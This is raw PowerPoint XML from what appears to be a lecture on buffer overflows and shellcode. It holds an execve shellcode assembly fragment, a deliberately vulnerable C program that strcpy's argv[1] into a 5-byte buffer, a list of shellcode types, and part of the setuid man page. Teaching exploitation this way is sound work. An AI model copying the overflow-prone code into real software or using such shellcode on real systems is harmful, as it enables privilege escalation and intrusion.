            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; This is an empty array for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          ; Push string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> to stack above null terminator.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; This is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> array with string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> al, 11        ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> #11.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80          ; Do it.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="230766021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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>brain-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>twist.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="223838" indent="-223838" algn="l" defTabSz="895350">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pP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smtClean="0"/>
              <a:t>Can we crash this?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467544" y="1551220"/>
            <a:ext cx="8352928" cy="3475310"/>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2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unistd.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stdlib.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	char buffer[5];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(buffer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	exit(0);	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="392797603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smtClean="0"/>
              <a:t>Types of shellcodes</a:t>
            </a:r>
            <a:endParaRPr lang="is-IS" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>Eject CD-ROM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="118872" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="is-IS" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>Spawn local shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="is-IS" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>Spawn remote shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="is-IS" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>Add user</a:t>
            </a:r>
            <a:endParaRPr lang="is-IS" b="0" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="is-IS" b="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>Anything you can think of...</a:t>
            </a:r>
            <a:endParaRPr lang="is-IS" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="is-IS" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2800852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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>man </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>setuid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="223838" indent="-223838" algn="l" defTabSz="895350">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pP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smtClean="0"/>
              <a:t>A matter of privilege</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467544" y="1551220"/>
            <a:ext cx="5976664" cy="4937249"/>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900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SETUID(2)                  Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Programmerâs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Manual                 SETUID(2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NAME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> - set user identity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SYNOPSIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       #include &lt;sys/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>types.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       #include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unistd.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uid_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DESCRIPTION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()  sets  the  effective  user ID of the calling process.  If the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       effective UID of the caller is root, the real UID and saved set-user-ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       are also set.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
